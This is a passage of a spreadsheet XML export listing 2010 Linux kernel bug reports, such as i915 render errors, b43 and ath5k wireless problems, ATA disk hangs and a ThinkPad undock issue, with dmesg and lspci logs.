    <t>Created attachment 25437 [details] patch to add support for NEC WL300NU-G - ar9170 based USB wifi card The patch was created with the instructions from this site (sorry it's in Japanese): http://vbnghtyu.blog54.fc2.com/blog-entry-40.html Thanks, Ben</t>
  </si>
  <si>
    <t>render error detected, EIR: 0x00000010</t>
  </si>
  <si>
    <t>2010-03-10 05:45 UTC</t>
  </si>
  <si>
    <t>Artem Anisimov</t>
  </si>
  <si>
    <t>2010-10-28 23:30 UTC</t>
  </si>
  <si>
    <t>When I updated to kernel 2.6.33 and userspace X driver xf86-video-intel-2.10.0, I started getting the following error in my dmesg: render error detected, EIR: 0x00000010 page table error PGTBL_ER: 0x00000010 [drm:i915_handle_error] *ERROR* EIR stuck: 0x00000010, masking render error detected, EIR: 0x00000010 page table error PGTBL_ER: 0x00000010 It did not happen with 2.6.33-rc5+xf86-video-intel-2.10.0 or with 2.6.33-rc5+xf86-video-intel-2.8.0. Here is my lspci: 00:00.0 Host bridge: Intel Corporation Mobile 915GM/PM/GMS/910GML Express Processor to DRAM Controller (rev 04) Subsystem: ASUSTeK Computer Inc. Device 1997 Flags: bus master, fast devsel, latency 0 Capabilities: [e0] Vendor Specific Information &lt;?&gt; Kernel driver in use: agpgart-intel 00:02.0 VGA compatible controller: Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller (rev 04) (prog-if 00 [VGA controller]) Subsystem: ASUSTeK Computer Inc. Device 1882 Flags: bus master, fast devsel, latency 0, IRQ 11 Memory at feb80000 (32-bit, non-prefetchable) [size=512K] I/O ports at ec00 [size=8] Memory at d0000000 (32-bit, prefetchable) [size=256M] Memory at feb40000 (32-bit, non-prefetchable) [size=256K] Expansion ROM at &lt;unassigned&gt; [disabled] Capabilities: [d0] Power Management version 2 Kernel driver in use: i915 00:02.1 Display controller: Intel Corporation Mobile 915GM/GMS/910GML Express Graphics Controller (rev 04) Subsystem: ASUSTeK Computer Inc. Device 1882 Flags: bus master, fast devsel, latency 0 Memory at fea80000 (32-bit, non-prefetchable) [size=512K] Capabilities: [d0] Power Management version 2 00:1b.0 Audio device: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) High Definition Audio Controller (rev 04) Subsystem: ASUSTeK Computer Inc. Device 1993 Flags: bus master, fast devsel, latency 0, IRQ 11 Memory at feb38000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 Capabilities: [60] MSI: Enable- Count=1/1 Maskable- 64bit+ Capabilities: [70] Express Root Complex Integrated Endpoint, MSI 00 Capabilities: [100] Virtual Channel &lt;?&gt; Capabilities: [130] Root Complex Link &lt;?&gt; 00:1d.0 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #1 (rev 04) (prog-if 00 [UHCI]) Subsystem: ASUSTeK Computer Inc. Device 1997 Flags: bus master, medium devsel, latency 0, IRQ 5 I/O ports at e400 [size=32] Kernel driver in use: uhci_hcd 00:1d.1 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #2 (rev 04) (prog-if 00 [UHCI]) Subsystem: ASUSTeK Computer Inc. Device 1997 Flags: bus master, medium devsel, latency 0, IRQ 7 I/O ports at e480 [size=32] Kernel driver in use: uhci_hcd 00:1d.2 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #3 (rev 04) (prog-if 00 [UHCI]) Subsystem: ASUSTeK Computer Inc. Device 1997 Flags: bus master, medium devsel, latency 0, IRQ 3 I/O ports at e800 [size=32] Kernel driver in use: uhci_hcd 00:1d.3 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB UHCI #4 (rev 04) (prog-if 00 [UHCI]) Subsystem: ASUSTeK Computer Inc. Device 1997 Flags: bus master, medium devsel, latency 0, IRQ 11 I/O ports at e880 [size=32] Kernel driver in use: uhci_hcd 00:1d.7 USB Controller: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) USB2 EHCI Controller (rev 04) (prog-if 20 [EHCI]) Subsystem: ASUSTeK Computer Inc. Device 1997 Flags: bus master, medium devsel, latency 0, IRQ 5 Memory at feb3fc00 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] Power Management version 2 Capabilities: [58] Debug port: BAR=1 offset=00a0 Kernel driver in use: ehci_hcd 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev d4) (prog-if 01 [Subtractive decode]) Flags: bus master, fast devsel, latency 0 Bus: primary=00, secondary=01, subordinate=02, sec-latency=32 I/O behind bridge: 0000d000-0000dfff Memory behind bridge: fe800000-fe8fffff Prefetchable memory behind bridge: 0000000040000000-0000000043ffffff Capabilities: [50] Subsystem: ASUSTeK Computer Inc. Device 1997 00:1f.0 ISA bridge: Intel Corporation 82801FBM (ICH6M) LPC Interface Bridge (rev 04) Subsystem: ASUSTeK Computer Inc. Device 1997 Flags: bus master, medium devsel, latency 0 00:1f.1 IDE interface: Intel Corporation 82801FB/FBM/FR/FW/FRW (ICH6 Family) IDE Controller (rev 04) (prog-if 8a [Master SecP P riP]) Subsystem: ASUSTeK Computer Inc. Device 1997 Flags: bus master, medium devsel, latency 0, IRQ 3 I/O ports at 01f0 [size=8] I/O ports at 03f4 [size=1] I/O ports at 0170 [size=8] I/O ports at 0374 [size=1] I/O ports at ffa0 [size=16] Kernel driver in use: ata_piix 01:03.0 CardBus bridge: Ricoh Co Ltd RL5c476 II (rev b3) Subsystem: ASUSTeK Computer Inc. Device 1997 Flags: bus master, medium devsel, latency 32, IRQ 7 Memory at fe800000 (32-bit, non-prefetchable) [size=4K] Bus: primary=01, secondary=02, subordinate=05, sec-latency=176 Memory window 0: 40000000-43fff000 (prefetchable) Memory window 1: 44000000-47fff000 I/O window 0: 0000d000-0000d0ff I/O window 1: 0000d400-0000d4ff 16-bit legacy interface ports at 0001 01:03.1 FireWire (IEEE 1394): Ricoh Co Ltd R5C552 IEEE 1394 Controller (rev 08) (prog-if 10 [OHCI]) Subsystem: ASUSTeK Computer Inc. Device 1997 Flags: bus master, medium devsel, latency 64, IRQ 6 Memory at fe8fd800 (32-bit, non-prefetchable) [size=2K] Capabilities: [dc] Power Management version 2 01:03.2 SD Host controller: Ricoh Co Ltd R5C822 SD/SDIO/MMC/MS/MSPro Host Adapter (rev 17) Subsystem: ASUSTeK Computer Inc. Device 1997 Flags: bus master, medium devsel, latency 64, IRQ 4 Memory at fe8fe400 (32-bit, non-prefetchable) [size=256] Capabilities: [80] Power Management version 2 01:03.3 System peripheral: Ricoh Co Ltd R5C592 Memory Stick Bus Host Adapter (rev 08) Subsystem: ASUSTeK Computer Inc. Device 1997 Flags: medium devsel, IRQ 4 Memory at fe8fe800 (32-bit, non-prefetchable) [size=256] Capabilities: [80] Power Management version 2 01:04.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL-8139/8139C/8139C+ (rev 10) Subsystem: ASUSTeK Computer Inc. L8400B or L3C/S notebook Flags: bus master, medium devsel, latency 64, IRQ 4 I/O ports at d800 [size=256] Memory at fe8fec00 (32-bit, non-prefetchable) [size=256] Capabilities: [50] Power Management version 2 Kernel driver in use: 8139too 01:05.0 Network controller: Intel Corporation PRO/Wireless 2200BG [Calexico2] Network Connection (rev 05) Subsystem: Intel Corporation Device 2701 Flags: bus master, medium devsel, latency 64, IRQ 3 Memory at fe8ff000 (32-bit, non-prefetchable) [size=4K] Capabilities: [dc] Power Management version 2 Kernel driver in use: ipw2200 Kernel modules: ipw2200</t>
  </si>
  <si>
    <t>No more b43 wireless interface since 2.6.34-rc1</t>
  </si>
  <si>
    <t>2010-03-10 06:59 UTC</t>
  </si>
  <si>
    <t>2010-05-16 19:22 UTC</t>
  </si>
  <si>
    <t>Acer Aspire 1511Lmi Athlon 64 3000 in 64bits mode 1.2 GB RAM Bluewhite63 13 (64bits port of Slackware) Since 2.6.34-rc1, my wireless chip is not recognized anymore by the b43 driver. I therefore cannot scan any AP, neither use it in any way. I append dmesg, lspci, etc.</t>
  </si>
  <si>
    <t>Undock button missing event - ThinkPad X40</t>
  </si>
  <si>
    <t>2010-03-12 11:29 UTC</t>
  </si>
  <si>
    <t>2010-04-16 19:57 UTC</t>
  </si>
  <si>
    <t>Created attachment 25482 [details] X40 DSTD Pressing the undock button on a "ThinkPad X4 Dock" with a ThinkPad X40 does not cause any udev events. And the lights on the dock never change to indicate it is safe to undock. kernel-2.6.33-8.fc13.i686 This did not work with Fedora 12 either, so I decided to try F13alpha, but it made no difference. # dmesg |grep -i acpi BIOS-e820: 000000004f6e0000 - 000000004f6f7000 (ACPI data) BIOS-e820: 000000004f6f7000 - 000000004f6f9000 (ACPI NVS) ACPI: RSDP 000f6d10 00024 (v02 IBM ) ACPI: XSDT 4f6e7e57 00054 (v01 IBM TP-1U 00002080 LTP 00000000) ACPI: FACP 4f6e7f00 000F4 (v03 IBM TP-1U 00002080 IBM 00000001) ACPI Warning: 32/64X length mismatch in Gpe1Block: 0/32 (20091214/tbfadt-526) ACPI Warning: Optional field Gpe1Block has zero address or length: 000000000000102C/0 (20091214/tbfadt-557) ACPI: DSDT 4f6e80e7 0ECE9 (v01 IBM TP-1U 00002080 MSFT 0100000E) ACPI: FACS 4f6f8000 00040 ACPI: SSDT 4f6e80b4 00033 (v01 IBM TP-1U 00002080 MSFT 0100000E) ACPI: ECDT 4f6f6dd0 00052 (v01 IBM TP-1U 00002080 IBM 00000001) ACPI: TCPA 4f6f6e22 00032 (v01 IBM TP-1U 00002080 PTL 00000001) ACPI: APIC 4f6f6e54 0005A (v01 IBM TP-1U 00002080 IBM 00000001) ACPI: BOOT 4f6f6fd8 00028 (v01 IBM TP-1U 00002080 LTP 00000001) ACPI: Local APIC address 0xfee00000 #6 [0000003000 - 0000007000] ACPI WAKEUP ==&gt; [0000003000 - 0000007000] ACPI: PM-Timer IO Port: 0x1008 ACPI: Local APIC address 0xfee00000 ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] enabled) ACPI: LAPIC_NMI (acpi_id[0x01] high edge lint[0x1]) ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0]) ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 high level) ACPI: IRQ0 used by override. ACPI: IRQ2 used by override. ACPI: IRQ9 used by override. Using ACPI (MADT) for SMP configuration information ACPI: Core revision 20091214 ACPI: bus type pci registered ACPI: EC: EC description table is found, configuring boot EC ACPI: Interpreter enabled ACPI: (supports S0 S3 S4 S5) ACPI: Using IOAPIC for interrupt routing ACPI: EC: GPE = 0x1c, I/O: command/status = 0x66, data = 0x62 ACPI: Power Resource [PUBS] (on) ACPI: ACPI Dock Station Driver: 4 docks/bays found ACPI: PCI Root Bridge [PCI0] (0000:00) pci_root PNP0A03:00: ignoring host bridge windows from ACPI; boot with "pci=use_crs" to use them pci 0000:00:1f.0: quirk: [io 0x1000-0x107f] claimed by ICH4 ACPI/GPIO/TCO ACPI: PCI Interrupt Routing Table [\_SB_.PCI0._PRT] ACPI: PCI Interrupt Routing Table [\_SB_.PCI0.PCI1._PRT] ACPI: PCI Interrupt Link [LNKA] (IRQs 3 4 5 6 7 9 10 *11) ACPI: PCI Interrupt Link [LNKB] (IRQs 3 4 5 6 7 9 10 *11) ACPI: PCI Interrupt Link [LNKC] (IRQs 3 4 5 6 7 9 10 *11) ACPI: PCI Interrupt Link [LNKD] (IRQs 3 4 5 6 7 9 10 *11) ACPI: PCI Interrupt Link [LNKE] (IRQs 3 4 5 6 7 9 10 *11) ACPI: PCI Interrupt Link [LNKF] (IRQs 3 4 5 6 7 9 10 *11) ACPI: PCI Interrupt Link [LNKG] (IRQs 3 4 5 6 7 9 10 11) *0, disabled. ACPI: PCI Interrupt Link [LNKH] (IRQs 3 4 5 6 7 9 10 *11) PCI: Using ACPI for IRQ routing pnp: PnP ACPI init ACPI: bus type pnp registered pnp: PnP ACPI: found 12 devices ACPI: ACPI bus type pnp unregistered apm: overridden by ACPI. acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5 acpiphp: Slot [1] registered ACPI: AC Adapter [AC] (on-line) ACPI: Lid Switch [LID] ACPI: Sleep Button [SLPB] ACPI: Power Button [PWRF] Switching to clocksource acpi_pm ACPI: Thermal Zone [THM0] (53 C) ACPI: Battery Slot [BAT0] (battery present) ehci_hcd 0000:00:1d.7: power state changed by ACPI to D0 uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0 uhci_hcd 0000:00:1d.1: power state changed by ACPI to D0 ACPI: Video Device [VID] (multi-head: yes rom: no post: no) i915 0000:00:02.0: power state changed by ACPI to D0 parport_pc 00:0a: reported by Plug and Play ACPI thinkpad_acpi: ThinkPad ACPI Extras v0.24 thinkpad_acpi: http://ibm-acpi.sf.net/ thinkpad_acpi: ThinkPad BIOS 1UETD3WW (2.08 ), EC 1UHTB2WW-1.62 thinkpad_acpi: IBM ThinkPad X40, model 2386F1U thinkpad_acpi: rfkill switch tpacpi_bluetooth_sw: radio is blocked Registered led device: tpacpi::thinklight Registered led device: tpacpi::power Registered led device: tpacpi::standby thinkpad_acpi: Console audio control enabled, mode: monitor (read only) input: ThinkPad Extra Buttons as /devices/platform/thinkpad_acpi/input/input7</t>
  </si>
  <si>
    <t>Blank screen after some time, after hibernation/suspend</t>
  </si>
  <si>
    <t>2010-03-12 17:24 UTC</t>
  </si>
  <si>
    <t>capsel</t>
  </si>
  <si>
    <t>Screens goes black (or almost black... grey?), somtimes I could see some random color bars across screen. I'm not certain about conditions as it happened after several hibernations and suspends, after about 2 hours of normal work. After a blank-out I can switch from X (alt+ctrl+f1) and press alt+ctrl+delete to restart, but screen is still blank. Pressing alt+ctrl+f7 (to X) does not help. The only error is in /var/log/messages: kernel: [drm:i915_gem_madvise_ioctl] *ERROR* Attempted i915_gem_madvise_ioctl() on a pinned object I wanted to try new kernel on msi wind u100 as 2.6.32 series gave almost instant blank-outs (black, pink...). I'm using gentoo, and it's kernel 2.6.31-gentoo-r10, and it works fine.</t>
  </si>
  <si>
    <t>[BUG] NULL pointer dereference in i915_gem_object_save_bit_17_swizzle</t>
  </si>
  <si>
    <t>2010-03-12 17:49 UTC</t>
  </si>
  <si>
    <t>2010-04-08 22:56 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] NULL pointer dereference in i915_gem_object_save_bit_17_swizzle Submitter : "Justin Madru" &lt;jdm64@gawab.com&gt; Date : 2010-03-04 9:00 Message-ID : 20100304090047.23689.qmail@info88.gawab.com References : http://marc.info/?l=linux-kernel&amp;m=126769366716380&amp;w=2 This entry is being used for tracking a regression from 2.6.32. Please don't close it until the problem is fixed in the mainline. Caused by: commit 280b713b5b0fd84cf2469098aee88acbb5de859c Author: Eric Anholt &lt;eric@anholt.net&gt; Date: Thu Mar 12 16:56:27 2009 -0700 drm/i915: Allow tiling of objects with bit 17 swizzling by the CPU. Signed-off-by: Eric Anholt &lt;eric@anholt.net&gt; First-Bad-Commit : 280b713b5b0fd84cf2469098aee88acbb5de859c</t>
  </si>
  <si>
    <t>2.6.34-rc1 hangs for 30 seconds when trying to access the disk</t>
  </si>
  <si>
    <t>2010-03-14 23:26 UTC</t>
  </si>
  <si>
    <t>Andrew Benton</t>
  </si>
  <si>
    <t>2010-04-08 20:08 UTC</t>
  </si>
  <si>
    <t>15549 15556 15716</t>
  </si>
  <si>
    <t>The system works fine with 2.6.33 Compiling 2.6.34-rc1 I accepted the defaults for all the new options (except the max no of GPUs). The kernel boot Ok but when I try to use the system and access the disk it freezes for about 30 seconds with no disk activity and then I get a message like this in the system log Mar 11 14:57:57 eccles kernel: ata2: clearing spurious IRQ Mar 11 14:58:27 eccles kernel: ata2: lost interrupt (Status 0x50) Mar 11 14:58:27 eccles kernel: ata2.01: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x0 frozen Mar 11 14:58:27 eccles kernel: ata2.01: failed command: WRITE DMA Mar 11 14:58:27 eccles kernel: ata2.01: cmd ca/00:08:4c:37:6f/00:00:00:00:00/fd tag 0 dma 4096 out Mar 11 14:58:27 eccles kernel: res 40/00:00:00:00:00/00:00:00:00:00/10 Emask 0x4 (timeout) Mar 11 14:58:27 eccles kernel: ata2.01: status: { DRDY } Mar 11 14:58:27 eccles kernel: ata2.00: hard resetting link Mar 11 14:58:28 eccles kernel: ata2.01: hard resetting link Mar 11 14:58:28 eccles kernel: ata2.00: SATA link down (SStatus 0 SControl 300) Mar 11 14:58:28 eccles kernel: ata2.01: SATA link up 3.0 Gbps (SStatus 123 SControl 300) Mar 11 14:58:28 eccles kernel: ata2.01: configured for UDMA/133 Mar 11 14:58:28 eccles kernel: ata2.01: device reported invalid CHS sector 0 Mar 11 14:58:28 eccles kernel: ata2: EH complete Or this: Mar 14 22:59:33 eccles kernel: ata2: clearing spurious IRQ Mar 14 23:00:03 eccles kernel: ata2: lost interrupt (Status 0x50) Mar 14 23:00:03 eccles kernel: ata2.01: exception Emask 0x0 SAct 0x0 SErr 0x0 action 0x0 frozen Mar 14 23:00:03 eccles kernel: ata2.01: failed command: READ DMA Mar 14 23:00:03 eccles kernel: ata2.01: cmd c8/00:08:cc:46:37/00:00:00:00:00/fc tag 0 dma 4096 in Mar 14 23:00:03 eccles kernel: res 40/00:00:00:00:00/00:00:00:00:00/10 Emask 0x4 (timeout) Mar 14 23:00:03 eccles kernel: ata2.01: status: { DRDY } Mar 14 23:00:03 eccles kernel: ata2.00: hard resetting link Mar 14 23:00:04 eccles kernel: ata2.01: hard resetting link Mar 14 23:00:04 eccles kernel: ata2.00: SATA link down (SStatus 0 SControl 300) Mar 14 23:00:04 eccles kernel: ata2.01: SATA link up 3.0 Gbps (SStatus 123 SControl 300) Mar 14 23:00:04 eccles kernel: ata2.01: configured for UDMA/133 Mar 14 23:00:04 eccles kernel: ata2.01: device reported invalid CHS sector 0 Mar 14 23:00:04 eccles kernel: ata2: EH complete I've tried compiling the kernel with different options. Enabling CONFIG_PATA_MPIIX or CONFIG_PATA_SCH (even though they weren't needed before). They made it more difficult to trigger the bug which makes me think maybe it's some sort of race condition. Intel(R) Core(TM)2 Quad CPU Q9550 @ 2.83GHz lspci: 00:00.0 Host bridge: Intel Corporation 4 Series Chipset DRAM Controller (rev 03) 00:01.0 PCI bridge: Intel Corporation 4 Series Chipset PCI Express Root Port (rev 03) 00:1a.0 USB Controller: Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #4 00:1a.1 USB Controller: Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #5 00:1a.2 USB Controller: Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #6 00:1a.7 USB Controller: Intel Corporation 82801JI (ICH10 Family) USB2 EHCI Controller #2 00:1c.0 PCI bridge: Intel Corporation 82801JI (ICH10 Family) PCI Express Root Port 1 00:1c.5 PCI bridge: Intel Corporation 82801JI (ICH10 Family) PCI Express Root Port 6 00:1d.0 USB Controller: Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #1 00:1d.1 USB Controller: Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #2 00:1d.2 USB Controller: Intel Corporation 82801JI (ICH10 Family) USB UHCI Controller #3 00:1d.7 USB Controller: Intel Corporation 82801JI (ICH10 Family) USB2 EHCI Controller #1 00:1e.0 PCI bridge: Intel Corporation 82801 PCI Bridge (rev 90) 00:1f.0 ISA bridge: Intel Corporation 82801JIR (ICH10R) LPC Interface Controller 00:1f.2 IDE interface: Intel Corporation 82801JI (ICH10 Family) 4 port SATA IDE Controller #1 00:1f.3 SMBus: Intel Corporation 82801JI (ICH10 Family) SMBus Controller 00:1f.5 IDE interface: Intel Corporation 82801JI (ICH10 Family) 2 port SATA IDE Controller #2 01:00.0 VGA compatible controller: ATI Technologies Inc RV770 [Radeon HD 4870] 01:00.1 Audio device: ATI Technologies Inc HD48x0 audio 03:00.0 Ethernet controller: Realtek Semiconductor Co., Ltd. RTL8111/8168B PCI Express Gigabit Ethernet controller (rev 02) 04:00.0 Multimedia video controller: Conexant Systems, Inc. CX23880/1/2/3 PCI Video and Audio Decoder (rev 05) 04:00.2 Multimedia controller: Conexant Systems, Inc. CX23880/1/2/3 PCI Video and Audio Decoder [MPEG Port] (rev 05) 04:00.4 Multimedia controller: Conexant Systems, Inc. CX23880/1/2/3 PCI Video and Audio Decoder [IR Port] (rev 05) 04:05.0 Network controller: RaLink RT2561/RT61 802.11g PCI</t>
  </si>
  <si>
    <t>ath5k: txbuf fills up in adhoc mode</t>
  </si>
  <si>
    <t>2010-03-15 09:13 UTC</t>
  </si>
  <si>
    <t>Johannes Karlsson</t>
  </si>
  <si>
    <t>2010-08-23 14:21 UTC</t>
  </si>
  <si>
    <t>When a network card using ath5k has been used in adhoc mode for a while (from minutes to hours) the txbuf fills up and no more packets get through. This error message is flooded in the kernel log: ath5k phy0: no further txbuf available, dropping packet Network card: Atheros AR5BXB63 03:00.0 Ethernet controller: Atheros Communications Inc. AR242x 802.11abg Wireless PCI Express Adapter (rev 01) It probably relates to this bug that was fixed for AP mode in this patch: commit a951ae2176b982574ffa197455db6c89359fd5eb Author: Bob Copeland &lt;me@bobcopeland.com&gt; Date: Wed Jan 20 23:51:04 2010 -0500 ath5k: fix setup for CAB queue The beacon sent gating doesn't seem to work with any combination of flags. Thus, buffered frames tend to stay buffered forever, using up tx descriptors. Instead, use the DBA gating and hold transmission of the buffered frames until 80% of the beacon interval has elapsed using the ready time. This fixes the following error in AP mode: ath5k phy0: no further txbuf available, dropping packet Add a comment to acknowledge that this isn't the best solution. Signed-off-by: Bob Copeland &lt;me@bobcopeland.com&gt; Acked-by: Nick Kossifidis &lt;mickflemm@gmail.com&gt; Signed-off-by: John W. Linville &lt;linville@tuxdriver.com&gt;</t>
  </si>
  <si>
    <t>black screen upon S3 resume, syslog has "render error" and "page table error"</t>
  </si>
  <si>
    <t>2010-03-16 00:45 UTC</t>
  </si>
  <si>
    <t>2011-08-23 23:22 UTC</t>
  </si>
  <si>
    <t>Created attachment 25539 [details] lspci -vvvnn output Twice since I started running 2.6.33 two weeks ago, the laptop (T60 w/ Intel graphics and wireless) has woken up from S3 sleep with a completely black screen. It happens maybe every 10 or 20 sleep/wake cycles. My usual trick of putting it back to sleep and waking it (Fn+F4 and then the tapping shift key) hasn't restored the screen, so I think it's a different bug than I've seen before (hence I checked "Yes" for the Regression question). But the system is otherwise responsive, so I can ctrl-alt-del and capture all lines of the logfile. The relevant piece of the syslog contained: [450210.002650] i915 0000:00:02.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [450210.002655] i915 0000:00:02.0: setting latency timer to 64 [450210.024621] render error detected, EIR: 0x00000010 [450210.024623] page table error [450210.024625] PGTBL_ER: 0x00000012 [450210.024628] [drm:i915_handle_error] *ERROR* EIR stuck: 0x00000010, masking [450210.024642] render error detected, EIR: 0x00000010 [450210.024644] page table error [450210.024645] PGTBL_ER: 0x00000012 I'll attach the Xorg.log from that boot and the output of lspci -vvvnn Here is a more of preceding context: [450209.292710] ACPI: Waking up from system sleep state S3 [450209.748145] i915 0000:00:02.0: restoring config space at offset 0x1 (was 0x900003, writing 0x900007) [450209.748166] pci 0000:00:02.1: restoring config space at offset 0x1 (was 0x900000, writing 0x900003) [450209.748207] HDA Intel 0000:00:1b.0: restoring config space at offset 0x1 (was 0x100106, writing 0x100102) [450209.748248] pcieport 0000:00:1c.0: restoring config space at offset 0x9 (was 0x1fff1, writing 0x60116001) [450209.748263] pcieport 0000:00:1c.0: restoring config space at offset 0x1 (was 0x180107, writing 0x100507) [450209.748331] pcieport 0000:00:1c.1: restoring config space at offset 0x1 (was 0x100107, writing 0x100507) [450209.748398] pcieport 0000:00:1c.2: restoring config space at offset 0x1 (was 0x100107, writing 0x100507) [450209.748445] pcieport 0000:00:1c.3: restoring config space at offset 0xf (was 0x40400, writing 0x4040b) [450209.748458] pcieport 0000:00:1c.3: restoring config space at offset 0x9 (was 0x10001, writing 0xe421e421) [450209.748464] pcieport 0000:00:1c.3: restoring config space at offset 0x8 (was 0x0, writing 0xebf0ea00) [450209.748470] pcieport 0000:00:1c.3: restoring config space at offset 0x7 (was 0x20000000, writing 0x20008070) [450209.748480] pcieport 0000:00:1c.3: restoring config space at offset 0x3 (was 0x810000, writing 0x810010) [450209.748488] pcieport 0000:00:1c.3: restoring config space at offset 0x1 (was 0x100000, writing 0x100507) [450209.792055] uhci_hcd 0000:00:1d.0: power state changed by ACPI to D0 [450209.792081] uhci_hcd 0000:00:1d.0: restoring config space at offset 0x1 (was 0x2800005, writing 0x2800001) [450209.792112] uhci_hcd 0000:00:1d.1: restoring config space at offset 0x1 (was 0x2800005, writing 0x2800001) [450209.800065] uhci_hcd 0000:00:1d.2: power state changed by ACPI to D0 [450209.800090] uhci_hcd 0000:00:1d.2: restoring config space at offset 0x1 (was 0x2800005, writing 0x2800001) [450209.800121] uhci_hcd 0000:00:1d.3: restoring config space at offset 0x1 (was 0x2800005, writing 0x2800001) [450209.800160] ehci_hcd 0000:00:1d.7: restoring config space at offset 0x1 (was 0x2900106, writing 0x2900102) [450209.800202] pci 0000:00:1e.0: restoring config space at offset 0x1 (was 0x100005, writing 0x100007) [450209.800281] PIIX_IDE 0000:00:1f.1: restoring config space at offset 0x1 (was 0x2880005, writing 0x2800005) [450209.800320] ahci 0000:00:1f.2: restoring config space at offset 0x1 (was 0x2b00007, writing 0x2b00407) [450209.800718] iwl3945 0000:03:00.0: restoring config space at offset 0x1 (was 0x100106, writing 0x100506) [450209.800840] yenta_cardbus 0000:15:00.0: restoring config space at offset 0xf (was 0x34001ff, writing 0x5c0010b) [450209.800847] yenta_cardbus 0000:15:00.0: restoring config space at offset 0xe (was 0x0, writing 0x94fc) [450209.800854] yenta_cardbus 0000:15:00.0: restoring config space at offset 0xd (was 0x0, writing 0x9400) [450209.800861] yenta_cardbus 0000:15:00.0: restoring config space at offset 0xc (was 0x0, writing 0x90fc) [450209.800868] yenta_cardbus 0000:15:00.0: restoring config space at offset 0xb (was 0x0, writing 0x9000) [450209.800876] yenta_cardbus 0000:15:00.0: restoring config space at offset 0xa (was 0x0, writing 0x67fff000) [450209.800883] yenta_cardbus 0000:15:00.0: restoring config space at offset 0x9 (was 0x0, writing 0x64000000) [450209.800890] yenta_cardbus 0000:15:00.0: restoring config space at offset 0x8 (was 0x0, writing 0xe3fff000) [450209.800897] yenta_cardbus 0000:15:00.0: restoring config space at offset 0x7 (was 0x0, writing 0xe0000000) [450209.800904] yenta_cardbus 0000:15:00.0: restoring config space at offset 0x6 (was 0x0, writing 0xb0171615) [450209.800913] yenta_cardbus 0000:15:00.0: restoring config space at offset 0x4 (was 0x0, writing 0xe4300000) [450209.800920] yenta_cardbus 0000:15:00.0: restoring config space at offset 0x3 (was 0x20000, writing 0x2a810) [450209.800929] yenta_cardbus 0000:15:00.0: restoring config space at offset 0x1 (was 0x2100000, writing 0x2100007) [450209.801152] PM: early resume of devices complete after 53.051 msecs [450210.002650] i915 0000:00:02.0: PCI INT A -&gt; GSI 16 (level, low) -&gt; IRQ 16 [450210.002655] i915 0000:00:02.0: setting latency timer to 64 [450210.024621] render error detected, EIR: 0x00000010 [450210.024623] page table error [450210.024625] PGTBL_ER: 0x00000012 [450210.024628] [drm:i915_handle_error] *ERROR* EIR stuck: 0x00000010, masking [450210.024642] render error detected, EIR: 0x00000010 [450210.024644] page table error [450210.024645] PGTBL_ER: 0x00000012</t>
  </si>
  <si>
    <t>BUG: key f70f4b50 not in .data</t>
  </si>
  <si>
    <t>2010-03-16 19:54 UTC</t>
  </si>
  <si>
    <t>2010-04-07 20:16 UTC</t>
  </si>
  <si>
    <t>Subject : BUG: key f70f4b50 not in .data Submitter : Sergey Senozhatsky &lt;sergey.senozhatsky@gmail.com&gt; Date : 2010-03-09 10:27 Message-ID : 20100309102754.GA3316@swordfish.minsk.epam.com References : http://marc.info/?l=linux-kernel&amp;m=126813046113130&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>WARNING: at net/mac80211/work.c:811 ieee80211_work_work+0x7f/0xde8 [mac80211]()</t>
  </si>
  <si>
    <t>2010-03-16 22:03 UTC</t>
  </si>
  <si>
    <t>2010-05-04 21:22 UTC</t>
  </si>
  <si>
    <t>Created attachment 25561 [details] dmesg Hi. I caught this after several resumes from s2ram, from s2disk it works ok. I attached my dmesg. Please inform me if I can do the report more useful.</t>
  </si>
  <si>
    <t>Screen backlight doesn't come back on after lid was closed (GM45)</t>
  </si>
  <si>
    <t>2.6.34-rc2</t>
  </si>
  <si>
    <t>2010-03-17 14:35 UTC</t>
  </si>
  <si>
    <t>bugs</t>
  </si>
  <si>
    <t>2010-05-04 20:58 UTC</t>
  </si>
  <si>
    <t>On a Dell Latitude E6400 with a GM45 closing the display lid turns the backlight off, opening the lid however doesn't turn it back on. I have to switch to another VT to turn it back on, then switch back to X. This was tested with the latest mainline kernel (http://kernel.ubuntu.com/~kernel-ppa/mainline/daily/2010-03-15/linux-image-2.6.34-999-generic_2.6.34-999.201003151003_amd64.deb). Originally reported at https://bugs.launchpad.net/ubuntu/+source/linux/+bug/488328 and https://bugs.launchpad.net/ubuntu/+source/linux/+bug/540134. 00:02.0 VGA compatible controller: Intel Corporation Mobile 4 Series Chipset Integrated Graphics Controller (rev 07)</t>
  </si>
  <si>
    <t>Watchdog problems</t>
  </si>
  <si>
    <t>2.6.33.1</t>
  </si>
  <si>
    <t>2010-03-17 18:19 UTC</t>
  </si>
  <si>
    <t>Herman Morsink Vollenbroek</t>
  </si>
  <si>
    <t>2011-01-21 12:44 UTC</t>
  </si>
  <si>
